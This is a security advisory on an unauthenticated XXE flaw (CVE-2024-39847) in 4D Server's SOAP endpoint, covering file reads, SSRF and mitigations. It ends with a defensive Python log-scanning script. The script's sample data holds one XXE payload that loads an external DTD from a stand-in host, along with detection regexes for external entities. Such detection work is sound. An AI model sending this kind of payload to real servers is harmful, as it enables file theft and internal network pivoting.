Unauthenticated XXE in 4D Server SOAP endpoint leaks files and drives SSRF
TL;DR - 4D Server's /4DSOAP endpoint resolves XML external entities with no authentication required. Point it at an attacker-controlled DTD, read files off the server or adjacent network shares, and make the server issue arbitrary HTTP GET requests to internal services.
What happened
4D Server is the database and application server at the core of the 4D development platform. CVE-2024-39847 describes an XXE vulnerability in its SOAP endpoint that any unauthenticated attacker on the network can exploit.
SCHUTZWERK's advisory demonstrates the attack: send a crafted SOAP body to /4DSOAP referencing an attacker-hosted DTD. That DTD instructs the parser to fetch file:// paths for local file reads, and remote URLs to make the server issue outbound HTTP GET requests. Two impact classes from one request - data exfiltration and SSRF-style internal pivoting.
One detail defenders should not miss: the advisory confirms the issue is exploitable even when the GUI option Reject SOAP-Requests is enabled. If you assumed that toggle was a compensating control, it isn't.
| Item | Detail |
|---|---|
| Affected component | 4D Server SOAP endpoint(s) / XML parser |
| Platform scope | Windows |
| Affected versions | <= v20 R3 affected; v20 R4 to v20 R6 status unknown |
| Severity | CVSS v4.0 8.7 (High) |
| Impact | Arbitrary file read (local and adjacent network shares), outbound HTTP GET (SSRF) |
XXE on an internet-reachable SOAP surface crosses trust boundaries fast - filesystem, SMB shares, and internal HTTP services - without needing any credentials.
Who is impacted
- Any internet-exposed 4D Server deployment where /4DSOAP is reachable.
- Environments running 4D Server in the affected version range.
- Highest-risk setups where the 4D Server service account can read sensitive local files, reach adjacent SMB or network shares, or connect to internal HTTP services that should never be externally reachable.
What to do now
- Apply the vendor fix. Update to 4D Server 20 R7 or higher.
- Treat this as broader than a web vulnerability. Audit what the 4D Server service account can access:
- filesystem paths holding secrets (config files, backups, key material)
- adjacent network shares reachable from the server host
- internal HTTP services that should not be reachable from this network tier
- If you cannot patch immediately, reduce exposure while you work toward it:
- restrict network access to /4DSOAP at the edge using allowlists, VPN requirements, or network segmentation
- do not rely on the Reject SOAP-Requests GUI option as a control - it does not block this attack
- monitor for unexpected inbound requests to /4DSOAP and for anomalous outbound HTTP from the server process, a common indicator of out-of-band XXE exfiltration
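The monitoring step above, as an added example that is not part of the advisory or of 4D's own tooling: it runs over constructed reverse-proxy request records and host egress records, flags /4DSOAP requests from sources outside an allowlist or carrying an external-entity DOCTYPE, and flags the 4D Server process talking to hosts it is not expected to reach. The process name, log field names and allowlists are assumptions.

```python
import re
from typing import List

# Constructed sample records, not real traffic: request logs from a reverse proxy
# in front of 4D Server (source, path, body excerpt) and host egress logs.
SAMPLE_REQUESTS = [
    {"src": "203.0.113.7", "path": "/4DSOAP", "body": "<soap:Envelope><soap:Body/></soap:Envelope>"},
    {"src": "203.0.113.9", "path": "/4DSOAP",
     "body": '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY % ext SYSTEM "http://dtd.example.invalid/x.dtd"> %ext;]><r/>'},
    {"src": "10.0.0.5", "path": "/4DACTION/Login", "body": "user=admin"},
]
SAMPLE_EGRESS = [
    {"proc": "4D Server.exe", "dst": "10.0.0.20", "port": 445},   # assumed process name
    {"proc": "4D Server.exe", "dst": "198.51.100.4", "port": 80},
    {"proc": "svchost.exe", "dst": "10.0.0.2", "port": 80},
]
# Hosts the 4D Server process is expected to talk to (assumed allowlist).
EGRESS_ALLOW = frozenset({"10.0.0.20"})

DOCTYPE_RE = re.compile(r"<!DOCTYPE", re.I)
# Any entity declared with SYSTEM or PUBLIC (general or parameter entity) is external.
EXT_ENTITY_RE = re.compile(r"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", re.I)


def is_xxe_candidate(body: str) -> bool:
    """A DOCTYPE that declares an external entity has no place in a legitimate
    SOAP request; flag it regardless of the URL or path it points at."""
    return bool(DOCTYPE_RE.search(body) and EXT_ENTITY_RE.search(body))


def scan_requests(records, allowed_sources=frozenset()) -> List[str]:
    """Alert on /4DSOAP requests from unexpected sources and on XXE-shaped bodies."""
    alerts = []
    for r in records:
        if not r["path"].upper().startswith("/4DSOAP"):
            continue
        if r["src"] not in allowed_sources:
            alerts.append(f"{r['src']} reached /4DSOAP outside allowlist")
        if is_xxe_candidate(r["body"]):
            alerts.append(f"{r['src']} sent external-entity DOCTYPE to /4DSOAP")
    return alerts


def scan_egress(records, allow=EGRESS_ALLOW) -> List[str]:
    """Outbound connections from the 4D Server process to hosts outside the
    allowlist are the out-of-band signal of an XXE DTD fetch or SSRF."""
    return [f"4D Server -> {r['dst']}:{r['port']} not in egress allowlist"
            for r in records
            if r["proc"].startswith("4D Server") and r["dst"] not in allow]
```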
